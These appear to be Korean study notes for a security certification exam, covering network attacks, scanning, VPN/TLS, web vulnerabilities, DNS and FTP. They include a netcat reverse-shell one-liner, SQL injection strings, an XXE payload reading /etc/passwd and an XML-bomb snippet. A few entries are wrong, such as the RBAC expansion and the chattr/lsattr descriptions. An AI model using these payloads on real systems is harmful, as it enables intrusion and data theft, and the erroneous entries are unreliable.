- Tiny Fragment Attack: IP 단편을 매우 작게 만들어 전송
- Fragment Overlap Attack(단편 중첩 공격): TCP 헤더가 중첩되어 덮어쓰면서, 허용되지 않은 포트로 접근
- (대역폭 소진) TCP Connection Flooding 공격: 다량의 SYN 패킷을 공격 대상에게 전송하여 다수의 ESTABLISHED 상태를 발생시키는 공격
  - SYN Flooding은 해당 공격의 일종
- (대역폭 소진) TCP SYN Flooding 공격: DDoS 공격의 하나로, TCP 핸드쉐이크를 이용한 공격
  - 다수의 SYN 패킷을 전송하여 다수의 SYN RECEIVED 상태를 발생시키는 공격
  - 대응방안: SYN Cookie 설정, 방화벽을 통해 동일 클라이언트 IP에 대해 SYN 임계치 설정
    - Syn Cookie로 완전연결되지 않으면 backlog queue가 소진되지 않도록 함
    - 동일 Client의 연결SYN 요청에 대한 임계치 설정
    - 첫 번째 SYN 패킷을 Drop하여, 재요청 패킷이 도착하는지 확인
- (대역폭 소진) UDP/ICMP Flooding 공격: 공격자가 대량의 UDP/ICMP 패킷을 공격대상 서버로 전송하는 공격
  - Ping of Death Attack: ICMP 패킷을 정상적인 크기보다 크게, 다수의 IP 단편화
- (서비스 마비) HTTP Flooding 공격: 공격자가 핸드쉐이크 후 HTTP GET 또는 POST 요청을 대량 반복 수행함으로서 이루어지는 공격
  - 좀비 PC의 IP를 변조하지 않고, 적은 개수의 패킷으로 효과적인 공격 가능
  - 공격 확인방법 : 웹서버 access 로그에 동일한 동적컨텐츠 호출로 인한 HTTP GET Flooding 공격 확인 ngrep -qtW byline | grep "GET /index.php"
- SSDP DRDoS 공격: UPnP 프로토콜(네트워크 장치들 간 연동)을 이용하여 IoT 시스템 공격
  - SSDP: 네트워크 서비스나 정보 찾기 위하여 사용하는 네트워크 프로토콜
  - Reflection 공격의 일종으로 1900번 포트를 사용하여 IoT 시스템을 공격하는 기법
  - 대응방안: 방화벽을 통해 1900번 포트 트래픽 차단, 노출된 SSDP 장치가 있는지 확인
- Hash DoS 공격: 다수의 매개변수(&)를 이용하여, 쓰레기값 파라미터를 추가해서 POST 방식으로 전송하면, 웹서버는 다수의 해시충돌로 컴퓨팅 리소스를 고갈되는 공격
- Hulk DoS 공격: 임계치 기반의 디도스 대응 장비를 우회하며, 쿼리스트링 파라미터가 계속 변경됨

Port Scan

해당 호스트에서 어떤 포트가 열려있는지 확인하여, 해당 네트워크가 사용하고 있는 시스템과 서비스 등을 알 수 있음
종류
- TCP Open Scan(=TCP Full Open Scan=TCP SYN/ACK Scan): 완전한 TCP 연결 맺어서 포트 활성화 여부 판단
  - 신뢰성 있는 결과 얻지만 속도 느리고 로그 남음
  - 포트 열려있는 경우: 공격자가 SYN 패킷 송신, 대상으로부터 SYN/ACK 패킷 수신, 공격자가 ACK 송신, 공격자가 RST/ACK 송신
  - 포트 닫혀있는 경우: 공격자가 SYN 패킷 송신하면 대상으로부터 RST/ACK 패킷 받음
- TCP SYN Scan(=TCP Half Open Scan): 세션을 완전히 연결하지 않고 포트 활성화 여부 판단(로그 안남김)
  - 포트 열려있는 경우: 공격자가 SYN 패킷 송신, 대상으로부터 SYN/ACK 패킷 수신, 공격자가 RST 패킷 송신
  - 포트 닫혀있는 경우: 공격자가 SYN패킷 보내면 대상으로부터 RST/ACK 패킷받음
  - 응답이 없는 경우 포트 사용 중이나 보안장비 등에 의하여 필터링됨
- TCP FIN/NULL/XMAS Scan: TCP 헤더 조작하여 특수한 패킷 보내고 응답받아 포트 활성화 여부 판단(로그 안남김)
  - 포트 열려있는 경우: 공격대상으로부터 응답 없음
  - 포트 닫혀있는 경우: RST 패킷 받음
- TCP ACK Scan: 포트의 오픈 여부를 판단하는 것이 아닌, 방화벽과 같은 보안장비의 필터링을 확인하기 위함
  - 필터링되고 있으면 응답이 없거나 ICMP 메시지 받고, 필터링 없다면 RST 응답 받음
- UDP Scan: 각 포트에 UDP 패킷을 보내고 응답 수신되면 포트 열린 것으로 간주, 다만 응답 수신되지 않는 경우 불확실하다.
  - 대신 TCP 스캔보다 빠르다.
  - SMTP(TCP 25), HTTPS(TCP 443), POP3(TCP 110)
nmap -sS, -sY, -sU, -sF, -sX, -sN
- -sA 방화벽확인
- -sP ping으로 활성화확인
- -D 주소위조
- -oN 일반파일, -oX xml파일, -oG Grepable파일

VPN (가상사설망)

Public Network를 사설망처럼 사용할 수 있게 해주는 기술
프로토콜
- 2계층(데이터링크): L2F, L2TP, PPTP VPN
  - L2F(Layer 2 Forwarding): CISCO사에서 개발한 터널링 프로토콜로 데이터 링크 계층에서 캡슐화를 지원
  - PPTP: 마이크로소프트社와 3Com社 등 여러 회사가 공동개발한 터널링 프로토콜로 RFC 2637으로 표준화됨
  - L2TP: 장점을 결합한 프로토콜로, 기밀성과 인증 기능의 부족으로 IPSec 프로토콜과 함께 사용되는 경우 많음
  - 데이터 링크 계층 기능: 회선제어(단방향/양방향), 흐름제어(정지/대기 방법, 슬라이딩 윈도우(수신측 최대 버퍼크기)), 오류제어
- 3계층: IPSec VPN (인터넷 계층에서 동작하는 대표적인 VPN 프로토콜)
- 4계층: SSL/TLS VPN
접근제어 기술 프로토콜: CSMA/CD(이더넷), CSMA/CA(무선랜)

IPSec(IP Security): 네트워크 계층에서 데이터를 보호하는 프로토콜

IP패킷을 암호화하고 인증하여 안전한 통신 채널을 제공하는 것이 목적
모드: IP의 내용(payload)만을 보호하는가, 또는 헤더까지 모두 보호하는가에 따라 모드가 나뉨
- 전송 모드(Transport Mode): 종단 간 데이터 보호가 필요할 때 사용
  - 전송 계층과 네트워크 계층 사이에 전달되는 payload를 보호함
  - 전송 계층에서 IPSec 계층을 거쳐서 IPSec헤더가 붙고 이것이 payload 취급되서 네트워크 계층에서 IP헤더 붙어서 전달됨
- 터널 모드(Tunnel Mode): 라우터간, 호스트와 라우터간 등 송수신자 양쪽 모두가 호스트는 아닌 경우에 사용됨
  - IP헤더를 포함한 IP계층의 모든 것을 보호함
  - 네트워크 계층에서 붙은 IP헤더까지를 payload 취급하여 IPSec헤더가 붙고 새로운 IP헤더 추가됨
프로토콜: IPSec은 두가지 보안 프로토콜을 제공
- AH(Authentication Header) 프로토콜: 발신지 호스트를 인증하고 IP패킷의 무결성을 보장 (비밀은 보장하지 않음)
- ESP(Encapsulation Security Payload) 프로토콜: 페이로드 전체를 보호하여 인증, 무결성, 기밀성 제공
기능 [기무인재접] + 비연결형
- 기밀성(ESP 대칭키 암호화): 암호화된 트래픽을 통해 데이터 노출 방지
- 무결성(AH 메시지 인증 코드 MAC): 메시지 위변조되지 않음을 보장
- 인증(AH 메시지 인증 코드 MAC): 정상 사용자로부터 송신된 데이터임을 보장
- 재전송 공격 방지(보안 연관 순서번호): 순서번호를 유지하여 재전송 공격 방지
- 접근제어(보안정책): 패킷의 허용, 폐기 보호 등 적용
IPSec VPN의 주요 구성요소
- AH: IP패킷에 무결성 및 인증 제공
- ESP: IP패킷 무결성, 인증 제공하고 암호화하여 기밀성 제공
- SA(보안연관): 두 IPSec 장치 간 통신을 보호하는데 사용되는 보안 매개변수(설정정보) 집합
- IKE: 키 관리 프로토콜, UDP 500포트 사용 (보안 관련 설정들을 생성, 협상 및 관리)
- SPD(보안 정책 데이터베이스): 보호할 트래픽과 보호 방법을 결정
전송 예시
- AH는 전송되는 필드와 인증되는 필드 동일, 암호화 기능 없음
- ESP는 전송, 암호화, 인증 필드가 다름
- TCP 헤더와 데이터를 합쳐서 IP Payload로 이해하기
AH 전송모드(암호화 기능 없음)
- 기본: [IP 헤더] [TCP 헤더] [데이터]
- 전송시: [IP 헤더] [AH 헤더] [TCP 헤더] [데이터]
- 인증되는 필드: [IP 헤더] [AH 헤더] [TCP 헤더] [데이터]
AH 터널모드(암호화 기능 없음)
- 기본: [IP 헤더] [TCP 헤더] [데이터]
- 전송시: [New IP 헤더] [AH 헤더] [IP헤더] [TCP헤더] [데이터]
- 인증되는 필드: [New IP 헤더] [AH 헤더] [IP헤더] [TCP헤더] [데이터]
ESP 전송모드
- 기본: [IP 헤더] [TCP 헤더] [데이터]
- 전송시: [IP 헤더] [ESP 헤더] [TCP 헤더] [데이터] [ESP Trailer] [ESP Auth]
- 암호화되는 필드: [TCP 헤더] [데이터] [ESP Trailer]
- 인증되는 필드: [ESP 헤더] [TCP 헤더] [데이터] [ESP Trailer]
ESP 터널모드
- 기본: [IP 헤더] [TCP 헤더] [데이터]
- 전송 시: [New IP 헤더] [ESP헤더] [IP헤더] [TCP헤더] [데이터] [ESP Trailer] [ESP Auth]
- 암호화되는 필드: [IP 헤더] [TCP 헤더] [데이터] [ESP Trailer]
- 인증되는 필드: [ESP헤더] [IP헤더] [TCP헤더] [데이터] [ESP Trailer]

SSL/TLS: 기밀성, 무결성, 인증 기능을 제공하는 4계층 웹 브라우저 보안 프로토콜

전송 계층 위에 TLS 계층을 따로 두어 동작함
TLS 사용하는 애플리케이션 프로토콜은 끝에 S가 붙게됨(HTTP > HTTPS)
SSL과 TLS의 차이는 버전과 암호화 알고리즘을 처리하는 방식에 있다.
보안 제공 방법: 사용자가 SSL로 보호되는 웹 사이트 접속하면 브라우저와 웹 사이트 서버는 SSL 핸드쉐이크를 통해 보안 연결 협상
- 세션 키 합의함으로서 전송되는 데이터 암호화하고 무결성 보장하는 보안 채널 제공
TLS 키 교환 프로세스
- 클라이언트가 암호화 알고리즘 및 매개변수 목록을 서버로 전송
- 서버는 클라이언트가 제공한 목록 중 암호화 알고리즘과 매개변수 선택하고 공개키와 디지털 인증서를 전송
- 클라이언트는 서버의 디지털 인증서 확인 후 임의의 암호화된 메시지 생성하여 서버로 전송
- 서버는 개인 키로 복호화하여 클라이언트와 서버 모두 고유한 세션키 생성 완료
제로 라운드 트립 타임(0-RTT): TLS 1.3에 추가된 기능, 세션키를 합의하는 핸드 셰이크 과정을 간소화하여 암호화 시간을 줄여주는 기능
DTLS(Datagram Transport Layer Security): UDP 기반으로 통신을 수행하는 경우 SSL/TLS와 유사한 보안 기능을 제공하는 프로토콜
POODLE(Padding Oracle On Downgraded Legacy Encryption) 공격: TLS 연결을 SSL 3.0으로 낮춰 SSL 3.0 취약점을 이용하여 암호문을 해독하는 공격 기법
HeartBleed 취약점(CVE-2014-0160): 통신 구간 암호화를 위해 사용하는 OpenSSL 암호화 라이브러리의 하트비트(Heartbeat)라는 확장 모듈에서 클라이언트 요청 메시지를 처리할 때 데이터 길이 검증을 수행하지 않아 시스템 메모리에 저장된 64KB 크기의 데이터를 외부에서 아무런 제한 없이 탈취할 수 있는 취약점 (SSL 프로토콜의 취약점이며, OpenSSL 1.01f 이전 버전이 영향 받음)
관련 용어
- Handshake : 종단간의 보안 파라미터를 협상
  - 완전협상과정 찾아봐야 하나?
- Change Cipher Spec : 협상된 보안 파라미터를 적용/변경 알림
- Record : 실질적 암복호화/검증
- SSL/TLS 완전 순방향 비밀성PFS
  - 서버 개인키가 노출되어도 이전 트래픽 정보의 기밀성은 그대로 유지
  - 키 교환시마다 임시Ephemeral 디피-헬만 키 교환
  - 속도가 느림, 브라우저 호환을 위해 RSA 키교환 함께 사용방화벽
종류
- 패킷 필터링 방화벽: Ingress/Egress 필터링 가능
- stateful 방화벽: 동일한 출발지 IP주소, 포트번호, 목적지 IP주소, 포트번호 등을 갖는 패킷들의 상태 저장하고 그룹으로 필터링하여 정교하게 차단 가능
- 웹방화벽: 웹 컨텐츠를 분석하고 탐지 및 차단할 수 있는 기능을 가지고 있는 보안장비 (캐슬, Webknight 등)
필터링 방법
- Ingress 필터링: 라우터 외부에서 내부로 유입되는 패킷 필터링, 인터넷 상에서 사용되지 않는 IP 대역은 차단 (존재하지 않는 외부 IP 이용한 Spoofing 공격 차단 가능)
- Egress 필터링: 라우터 내부에서 외부로 나가는 패킷 필터링, 내부에서 관리중인 IP가 아니라면 위조로 판단 (source IP는 반드시 라우터와 같은 대역이어야 함)

IDS

종류
- H-IDS: (호스트기반) 트립와이어 툴
- N-IDS: (네트워크 기반) 스노트 툴
탐지결과
- 오탐(False Positive): 정상적인 행위를 이상행위로 판단하여 탐지하는 상황
- 미탐(False Negative): 이상행위를 탐지하지 못하는 상황
탐지기법
- 오용탐지 : 잘 알려져 있는 공격패턴을 룰로 등록하고, 패턴과 일치여부에 따라 침입여부를 판단하는 방식(등록된 공격패턴에 의하여 탐지되므로 오탐률 낮음, 새로운 공격은 탐지 불가하며, 지속적으로 패턴 업데이트 필요)
- 이상탐지(비정상행위 탐지): 정상행위와 이상행위 분석하고, 통계적 분석을 통하여 침입여부를 판단하는 방식
설치위치
- 라우터 전 : 모든 트래픽 탐지, but 성능상 문제
- 라우터 후 : 효율적 탐지, but 방화벽 뒤 트래픽 탐지안됨
- 라우터>방화벽 사이 : 효율적 탐지, 보호구간내 트래픽 탐지, but외부유입되는 모든 트래픽은 모름
IDS는 미러링모드로, IPS는 인라인 모드로 설치

용어	설명
Tiny Fragment	- 공격자가 패킷을 소형 단편화하여 공격하는 것 - 쪼개진 패킷을 재조합하는 기능이 없는 방화벽에서는 탐지하거나 차단 불가 - 대응방안: 단편화된 패킷 재조합 기능있는 방화벽 사용
스위칭 허브	패킷의 목적지 주소(MAC, IP, Port 등)를 확인하여, 목적지가 연결된 스위치의 포트로만 패킷을 전송하는 장치 - 패킷의 고속 전송, 로드 밸런싱, QoS 기능을 수행 * 동작 원리 - Leaning: 테이블에 정보 저장 - Flooding: 모르는 정보를 모든 호스트에 전달 - Forwarding: 알고있는 목적지로 정보 전달 - Filtering: 다른 목적지로 넘어가지 못하게 제어 - Aging: 오래된 정보 삭제
스위치 재밍(MAC Flooding)	스위치 Mac address table 버퍼 오버플로우 공격으로, 스위치를 허브처럼 동작하게 만드는 기법
Wireshark	- 질의에 대한 응답 패킷만을 보기 위한 필터링 구문: dns.flags.response==1 - 질의만을 보기 위한 옵션: dns.flags.response==0
TCP	- 3 way 핸드쉐이크 과정: SYN 전송 > SYN-ACK 전송 > ACK 전송 - SYN seq값은 앞에 ack값이 있으면 그 값 그대로 가져감 - ack값은 seq+1 (ex) SYN seq(100) 전송 > SYN/ACK seq(200)/ack(101) 전송 > ACK seq(101)/ack(201)
Promiscuous mode(무차별 모드)	- 네트워크 카드의 특정 인터페이스로 들어오는 모든 패킷을 수신하게 된다. (ex) device eth0 entered Promiscuous mode : eth0 인터페이스로 들어오는 모든 패킷 수신 - 해당 모드 진입 시 패킷 스니핑 공격 가능 - 대응방안: 통신시 SSH, HTTPS와 같은 암호화 통신 사용
비콘Beacon 프레임/메시지	무선AP가 자신이 관리하는 무선랜BSS의 존재를 정기적으로 알리는 브로드캐스트 프레임/메시지
NAC(네트워크접근제어)	단말기가 내부 네트워크에 접속을 시도할 때 이를 제어하고 통제
UTM(통합보안시스템)	다양한 보안 기능을 하나의 장비로 통합해 제공
EDR(엔드포인트 탐지 및 대응 솔루션)	엔드포인트에서 발생하는 악성행위를 실시간으로 감지
스팸차단솔루션 (Anti-spam solution)
보안운영체제 (Secure OS)
디지털 저작권 관리 DRM	저작권자가 배포한 디지털 자료나 하드웨어의 사용을 제어하고, 이를 의도한 용도로만 사용하도록 제어하는데 사용되는 모든 기술
네트워크/단말 정보유출방지 DLP	정보의 흐름에 대한 모니터링과 실시간 차단 전사적 보안관리 시스템
ESM 솔루션	초기
SIEM (Security Infomation & Event Management)	보안정보 및 이벤트관리 솔루션 (빅데이터 기반, 분석)
SOAR (Security Orchestration, Automation and Response)	보안 오케스트레이션, 자동화 및 대응 시스템 솔루션 (AI, 머신러닝 활용)
위협 인텔리전스(TI: Threat Inteligence)	수많은 위협 정보를 수집, 분석, 활용하여 생성해내는 증거 기반 정보, SIEM, SOAR 등 보안관제 솔루션과 연계
PMS	패치 관리 시스템
HSM	하드웨어 보안 모듈
통합 접근 관리 EAM	(통합 인증SSO과 사용자별/그룹별 접근권한 통제)
통합 계정 관리 IAM	EAM에서 확장, 자동화
샌드박스Sandbox	보호된 영역에서 시행시켜, 내부 시스템에 악영향을 주는 것을 미연에 방지하는 기술
APT 대응 시스템	가상머신 기반의 샌드박스 환경에서 해당 파일을 직접 실행하여 악성 여부를 판단하는 행위기반분석 보안장비
네서스nessus	테너블사tenable 개발. 알려진 취약점에 대한 점검을 수행
닉토nikto	방대한 취약점 DB를 통해 웹서버에 대한 포괄적 점검을 수행
루트킷 점검도구 chkrootkit * INFECTED : 해당 파일이 변조됨 * ps 실행결과와 /proc 디렉터리에 있는 프로세스 정보를 비교
cp exe /root/tmp/test_bdoor	cp 명령어로 삭제된 프로세스 복원
rpm -V 패키지 이름	RPM 명령으로 변조파일 확인
lsattr 명령어	-i : 읽기 전용으로 변경
chattr 명령어	+i : 읽기 전용 해제
리버스 쉘	내부에서 netcat 프로그램을 이용한 리버스 쉘 연결 작업 ((공격자서버) nc -lvp 80 -> (희생자서버) nc 공격자 ip주소 -e /bin/bash ) 외부에서 리버스 쉘을 이용해 웹서버에 악의적인 명령 수행 ( nc 커넥터가 nc 리스너로 접속 )
strace -e trace=open ps	특정 프로그램의 시스템 콜과 시그널을 추적하는데 사용하는 디버깅 도구
웹서버 침해사고 흔적 조회	임시 인터넷 객체, 임시 인터넷 파일(캐시), 열어본 페이지(히스토리), 임시 쿠키 파일

전송계층

Multiplexing(다중화)
- 여러 소켓에서 데이터를 모아서 각 데이터의 헤더 정보를 캡슐화하여 세그먼트로 전달
- 하나의 기능(매체)를 여러 영역에서 동시에 사용하는 기법
Demultiplexing(역다중화)
- 수신된 세그먼트를 나눠서 올바른 소켓에 전달
- 공유하는 기능으로부터 개별 영역으로 분할하는 기법

애플리케이션 보안

웹 서버 설정

Apache 로그파일
- Access 로그: 웹 서버가 클라이언트 요청에 대해 반환한 응답에 대한 정보 기록
- Error 로그: 웹 서버에서 발생한 오류와 경고에 대한 정보 기록
- httpd.conf: 로그파일 경로 확인 가능한 파일 Errorlog "/var/log/httpd/error_log"
Apache 설정파일
- KeepAlive On: KeepAlive 옵션 켜기
- MaxKeepAliveRequests 100: KeepAlive 허용하는 유저 수 100명 설정
- KeepAliveTimeout 100: KeepAlive 유지시간 100초 설정
- DirectoryIndex index.htm index.html: 디렉터리 접근 시 index.htm 먼저 읽고 없으면 index.html 읽기
- CustomLog /www/logs/access_log common: 로그파일을 /www/logs/access_log 경로에 저장
명령어
- LimitRequestBody: httpd.conf 파일에서 디렉터리에 업로드 가능한 최대 파일크기 제한하는 명령어

SMTP

SFP : DNS의 TXT레코드에 IP 등록
DKIM : 전자서명+DNS의 TXT레코드에 공개키 등록
DMARC = SFP + DKIM

HTTP

Keep-Alive On : TCP 연결 일정시간 유지 (+ KeepAliveTimeout 15 )
서버가 Set-cookie : name=test 로 -> 클라이언트는 Cookie : name=test 로 받음
httponly : 스크립트를 통해 해당 쿠키에 접근하는 것을 차단
secure : 클라이언트가 https(SSL/TLS) 통신을 할 때만 쿠키를 전송
- php면 php.ini의 session.cookie_secure = 1
자동화공격의 대응방법: 캡차
robots.txt의 정의 속성: User-agent, Allow, Disallow
- 속성: 내용 (대소문자 구분 함)
심볼릭링크 삭제 FollowSymLinks
Referer 식별자 : 제3의 url에서 접근할 경우, 자동화 공격 의심

웹 취약점

SQL Injection: DB와 연결되어 있는 애플리케이션의 입력값을 조작하여 의도하지 않은 결과를 반환하도록 하는 공격 기법
- 예시: ' or 1=1# (mysql) ' or 1=1-- (그외)
- 대응방안 = prepared statement
  - 최초에 한번 쿼리를 분석해 최적화 수행 후 메모리에 저장해두고, 다음 요청부터는 저장된 결과를 재사용하여 쿼리를 수행하는 방식
  - 사용자가 입력한 값이 SQL 쿼리가 아닌 매개 변수로 처리되기 때문에 SQL 인젝션 공격을 막을 수 있음
  - 성능 측면 효율이 높고 SQL 인젝션 방지 가능
  - php.ini 설정: magic_quotes_gpc, mysql_real_escape_string
- Error based SQL Injection: SQL의 잘못된 문법이나 자료형 불일치 등에 의해 데이터베이스가 알려주는 오류 메시지에 의존하여 수행되는 공격 기법
- UNION based SQL Injection: 데이터베이스 오류 메시지를 표시하지 않을 경우 사용하며, 기존 정상쿼리와 악성쿼리를 합집합으로 출력하여 정보 획득하는 기법
- Blind based SQL Injection: HTTP 응답이나 데이터베이스 오류 메시지를 표시하지 않는 경우 사용하며, 요청이 참인지 거짓인지만 확인할 수 있을 때 사용 (입력값 바꿔가면서 계속 시도하여야 함)
  - 예시: find=board&search=%27+and+substr%28%28select+table_name+from+information_schema.tables+where+table+type%3D%27base_table%27+limit+0%2C ... 하략 => 공격자는 information_schema.tables 테이블을 통해 사용자가 생성한 테이블의 이름을 알아내려 하고 있다.
XSS: 게시판, 웹, 메일 등에 삽입된 악의적인 스크립트에 의해 클라이언트측에서 쿠키정보 탈취 및 기타 개인정보를 특정 사이트로 전송시키는 공격 기법
- 대응방안: 사용자 입력 문자열에서 HTML 코드로 인식될 수 있는 특수문자(<,>,&,/,(,))를 일반문자로 치환하여 이스케이프 처리
- URL 인코딩: <(0X3C, %3C), =(0X3D, %3D), >(0X3E, %3E), '(0X27, %27), 공백(0X20, %20), #(0X23, %23)
CSRF : 악의적 행위(개인정보 변경)가 서버에서 발생
SSRF(서버 사이드 요청 위조) : 공격자가 요청정보를 조작하여, 웹서버가 내부 서버에 조작된 요청을 하도록 함.
Directory Indexing(Directory Listing): 특정 디렉터리에 초기 페이지(index.html, home.html 등)의 파일이 존재하지 않을 때 자동으로 디렉터리 리스트를 출력하는 취약점
- 대응방안: 디렉터리 인덱싱을 비활성화하도록 웹 서버 구성하여 방지 가능, Apache 웹 서버의 .htaccess 파일에 Options에서 Indexes 문구 삭제
운영체제 명령어 삽입 (OS Command Injection) 취약점: 시스템 명령어를 실행할 수 있는 함수 syxtem, exec 등
- 상위 디렉터리 이동 : . (%2e 또는 %252e), .. (%2e%2e 또는 %252e%252e)
파일 업로드 공격: 실행 가능한 스크립트 파일(jsp, php, sh)을 첨부하여 원격에서 제어하는 공격
- 웹쉘: 첨부되는 스크립트 파일
- 대응방안: .htaccess 파일 설정하기
- FilesMatch #특정 확장자들을 deny하거나 allow 설정할 수 있는 지시자 AddType text/html .html #특정 확장자들을 html로 해석되도록 만들 수 있는 지시자 LimitRequestBody #크기제한
File Inclusion 공격: - include 또는 require 함수 사용
- allow_url_fopen = Off 로 설정하여 대응
- display_errors=Off 로 에러페이지 노출 방지
Drive By Download: 사용자가 접속한 웹페이지에서 팝업, ifram, 리다이렉트 등을 통해 사용자가 인식하지 못하게 악성코드 다운로드시키는 유형
Dropper: 정상 애플리케이션인 것처럼 배포된 뒤 자신의 내부에 압축해서 가지고 있던 코드를 이용하여 새로운 악성코드를 생성하여 시스템을 감염
XXE(XML eXternal Entity) Injection: XML 문서 안에서 외부의 개체를 참조하게 되는데 이때 외부 개체에 삽입된 악의적인 코드가 실행되어 데이터 유출, 서비스 거부 공격 등을 수행 가능 ＜!ENTITY xxe SYSTEM "file:///etc/passwd" ＞]＞
- XML Bomb (개체 반복참조 서비스거부 유발)
XPath/XQuery 인젝션: 입력값 검증으로 대응
DoS 공격: 엔티티 참조를 반복하면서 메모리 고갈, 이로 인한 서비스 불가 <!ENTITY lol "lol"＞＜!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"＞

웹 보안 방안

쿠키 보안: 서버에서 클라이언트 데이터를 저장하는 방법 중 하나
- 쿠키: 클라이언트(브라우저) 로컬에 저장되는 키와 값이 들어있는 작은 데이터 파일
- Secure: 쿠키 옵션 중 하나로, true이면 HTTPS 프로토콜을 이용하는 경우에만 쿠키 전송 가능, 전송 중 평문 쿠키 노출을 방지 가능
- HttpOnly: 쿠키 옵션 중 하나로, true이면 자바스크립트에서 쿠키 접근이 제한됨, 허용하면 XSS 공격에 취약하게 되므로 주의
- 예시 Set-Cookie: ID=redstone; Path=/; secure (클라이언트가 HTTPS 통신일 경우에만 해당 쿠키 전송함)
이메일 보안
- SPF(Send Policy Framework): 일치하는 경우 정상 처리하고, 일치하지 않을 경우 차단하는 대표적인 이메일 스팸 차단 기술
  - 이메일 발송 도메인의 DNS에 txt레코드로 등록된 IP주소와 실제 메일의 송신 IP를 비교하여 메일 도메인의 정당성을 검증
- DKIM(DomainKeys Identified Mail): 메일 헤더가 변조되지 않았고 실제 해당 도메인에서 발송된 것을 확인 가능
  - 이메일 서버의 개인키로 이메일 헤더를 전자서명하고, 메일 도메인서버의 txt레코드로 등록된 공개키로 검증하도록 함
- DMARC(Domain-based Message Authentication, Reporting and Conformance): SPF와 DKIM을 혼합한 기법
- PGP(Pretty Good Pricacy): 필 짐머만 독자 개발, PEM에 비해 보안성은 떨어지나 구현이 용이하고 무료로 배포되어 많이 사용됨
인증서
- CRL: 인증서 폐지 목록
- OCSP: CRL의 실시간 버전
- OpenSSL 보안가이드 내용
- SSLProtocol all -SSLv2 -SSLv3 SSLCipherSuite ALL:!aNULL:!eNULL:!EXP:!ADH:!DES:!RC4:!MD5

DNS(Domain Name System)

도메인을 IP로 변환하거나 IP를 도메인으로 변환하는 프로토콜
/etc/hosts: DNS 정보를 담고 있는 파일
53/UDP(기본), 53/TCP(512Byte이상)
목적
- 호스트 별칭 지정: 하나 이상의 별명 가질 수 있음 ex) redstone.com과 www.redstone.com등
- 부하 분산: 같은 도메인에 대하여 여러 IP 지정 가능, 따라서 DNS서버는 IP 번갈아가면서 알려줄 수 있음
DNS 캐시: 상위 DNS 서버에 질의하는 부하를 줄이기 위함
- TTL: DNS 서버 정보를 캐시에 보관하는 기간(통상 2일)
DNS Zone transfer(53/tcp): 여러 DNS 서버끼리의 데이터베이스(zone)를 복제 또는 동기화할 수 있게 해주는 방법
- AXFR : 존 버전에 상관없이 무조건 존 전송 요청 IXFR : 존 버전을 비교하여 상위 버전일 경우 존 요청 재귀적 질의 제한 : recursion no;
윈도우 DNS 서버 설정 절차
- 영역 등록: 도메인 DNS서버를 등록하는 절차
- 호스트 등록: DNS서버에 서비스 정보 입력하는 절차
- Zone 정보 동기화 방법(named.conf) allow-transfer { 슬레이브 서버 IP };
(윈도우) dns 테이블 조회 ipconfig /displaydns dns
(윈도우) dns 테이블 삭제 ipconfig /flushdns
관련 공격
- DNS Cache Poisoning 공격: 사용자에게 전달되는 DNS 서버의 캐시 정보를 조작하여 의도치않은 사이트로 접속하게 만드는 공격
  - 사용자가 사이트에 접속 시도(DNS 질의) > 공격자가 정상 응답보다 빠르게 희생자에게 조작된 DNS 응답을 보냄 > 캐시 DNS 서버에 조작된 주소 정보가 저장됨 > 먼저 수신한 응답 신뢰 특성으로 인해 이후 들어온 정상 응답 폐기 > 사용자는 조작된 주소 사이트로 접속
- DNS 증폭 공격(Amplication): DNS 질의는 인증 절차가 없다는 점을 이용
  - DNS 질의 트래픽은 요청량보다 DNS서버로부터의 응답량이 많다는 점을 이용
  - 공격자가 중계DNS서버에 DNS 쿼리의 Type을 ANY로 변경한 후 출발지를 피해자 IP로 수정 > 중계DNS서버는 ANY요청에 따라 A, NS, CNAME 등 모든 정보 응답
- IP 기반 DNS 증폭 공격: IP Spoofing을 사용하여 출발지 IP를 피해자 IP로 위조한 후 다수의 DNS 질의 수행하는 공격
  - ANY 또는 TXT 쿼리 타입 이용: 요청 패킷 크기보다 응답 패킷 크기가 크기 때문

FTP(File Transfer Protocol)

인터넷 기반 파일 전송 프로토콜
동작 원리: FTP 서비스 제공하는 서버와 접속하는 클라이언트 사이에 2개의 연결이 생성됨
- 21/TCP: 데이터 전송을 제어하기 위한 신고 주고 받기 위함
- 20/TCP: 실제 데이터 전송에 사용됨
공격 유형
- FTP Bounce 공격: FTP 서버가 데이터 채널(20) 생성 시 목적지를 검사하지 않는 프로토콜 구조적 취약점 이용
  - 익명 FTP 서버를 이용해 공격자가 Port 명령을 조작하여 공격 대상의 네트워크 및 포트 스캔, 거짓 메일, 데이터 전송 등이 가능
  - 대응방안: FTP 서버 업데이트, 자료 전송할 때 1024번 포트보다 낮은 포트번호로 접속하지 않도록 설정
- Anonymous FTP 공격: anonymous 접속이 허용된 상태에서는 누구든지 anonymous 또는 ftp라는 이름으로 FTP 실행해 접근 가능. 이를 통해 악성코드 업로드 가능
  - 판단방법: 21번 포트에서 탐지되었으며, 사용자명이 본래 계정이 아닌 경우
  - 대응방안: anonymous FTP 불필요한 경우 비활성화
  - > userdel ftp > userdel anonymous > vsFTP인 경우, vi /etc/vsftpd.conf 들어가서 anonymous_enable=NO 설정하기
TFTP 공격: 69/UDP 사용하고 인증절차 없기 때문에 접근제어 여부에 따라 임의로 디렉터리 및 파일 접근 가능
- 대응방안: TFTP 불필요한 경우 비활성화
SFTP(포트 22번): SSH 방식을 이용하여 안전하게 암호화된 구간에서 FTP 기능 이용
ftpusers : 접속을 제한할 계정정보
vsftpd.conf에 userlist_enable=YES로 설정했을 때, user_list로 제어가능
vsftpd.conf의 tcp_wrappers=YES로 설정시 hosts.allow, hosts.deny 파일 사용가능

데이터베이스 보안

접근제어정책

DAC(Discretionary Access Control, 임의적 접근통제): 접근주체 신분 기반으로 권한 부여
- 특징: ACL 사용
MAC(Mandatory Access Control, 강제적 접근통제): 주체, 객체 등급 기반으로 권한 부여
- 주체의 레이블과 주체가 접근하고자 하는 객체의 레이블을 이용
- 특징: 규칙이 단순하여 관리가 용이
RBAC(Rule-Based Access Control, 역할기반 접근통제): 주체, 객체 역할 기반으로 권한 부여
- 비 임의적 접근통제 모델, 임무기반 접근통제 모델
- 특징: 최소권한 원칙, 직무분리 원칙 지켜짐, 효율적

SQL 종류

DML 데이터조작 (데이터 조작)
DDL 데이터정의 (객체 정의/삭제/변경)
DCL 데이터제어 (권한)
TCL 트랜잭션 제어 (커밋 롤백)

DB 암호화

API 방식 : 각 애플리케이션 서버에 설치 (수정필요)
Plug-in 방식 : DB 서버에 설치
Hybrid 방식 : API + Plug-in
